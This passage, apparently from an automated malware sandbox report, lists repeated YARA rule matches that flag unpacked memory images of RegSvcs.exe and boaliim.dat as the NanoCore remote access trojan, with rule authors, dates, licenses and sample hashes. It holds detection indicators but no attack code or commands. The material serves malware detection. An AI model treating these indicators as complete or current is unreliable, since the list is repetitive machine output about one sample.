Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
